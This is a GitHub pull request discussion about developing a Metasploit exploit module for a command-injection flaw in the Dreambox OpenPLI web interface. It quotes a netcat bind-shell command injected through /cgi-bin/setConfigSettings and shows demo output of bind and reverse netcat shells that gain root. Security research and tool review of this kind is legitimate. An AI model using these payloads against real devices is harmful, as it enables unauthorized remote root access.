New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Openpli #1496
Openpli #1496
Conversation
Overriding the payload is not ok. |
could you explain it for me a bit more in detail? Thanks |
uri = '/cgi-bin/setConfigSettings' | ||
|
||
if payl =~ /bind/ | ||
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Don't do this. You're breaking handlers and bypassing encoders.
The device has a netcat binary installed. This netcat binary does not understand the typical -e switch that is used by the metasploit payloads. After discussing this issue with Juan offline it looks like the correct way is to generate a new cmd payload for this module. But for now it is just this one module that will use this payload. @jlee-r7 should we generate a new payload or is there any better way? Best, |
Hi m-1-k-3 we just merged #1576 . Hopefully the new netcat payloads can be used from the Openpli module and we can close it soon! |
'Compat' => | ||
{ | ||
'PayloadType' => 'cmd', | ||
'RequiredCmd' => 'netcat-e generic' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hopefully
'RequiredCmd' => 'netcat'
can be used now, after #1576 , and the embedded payloads into the module code can be avoided.
Please feel free to update it and update us with anything!
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/bind_netcat_openbsd [] Started bind handler uid=0(root) gid=0(root) Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/reverse_netcat_openbsd [] Started reverse handler on 192.168.178.105:4444 uid=0(root) gid=0(root) |
Hi @m-1-k-3 , I've done a PR to your repo: m-1-k-3#3 I've done the final module cleanup for myself, please feel free to review changes, ask any doubt about my changes and once you can verify it's working it will be ready to merge. Just land the PR above on your repo and this one will be updated automatically. I've verified the generated http request and it seems okay, but since I've not a real device to test, I'll need your help again! |
works very good
Merged, thanks @m-1-k-3 !! |
Hey guys,
attached you will find the module for the openpli web vulnerability.
http://www.s3cur1ty.de/m1adv2013-007
Looking forward to your feedback.
Best,
mIke